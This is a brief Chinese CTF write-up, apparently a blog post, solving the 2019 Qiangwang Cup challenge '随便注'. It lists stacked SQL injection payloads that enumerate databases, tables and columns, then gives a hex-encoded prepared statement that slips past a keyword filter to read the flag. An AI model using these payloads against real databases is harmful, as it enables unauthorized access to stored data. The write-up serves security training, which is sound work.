[强网杯 2019]随便注

发布时间 2023-10-31 17:40:03作者: imtaieee

打开题目,输入:11';show databases;# 后可以发现是堆叠注入。
image.png
输入:11';show tables;#
image.png
查看 1919810931114514 表中有什么字段:11';show columns from 1919810931114514;#
image.png
查看 words 表中有什么字段:11';show columns from words;#
image.png
使用预处理语句,输出 flag11';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#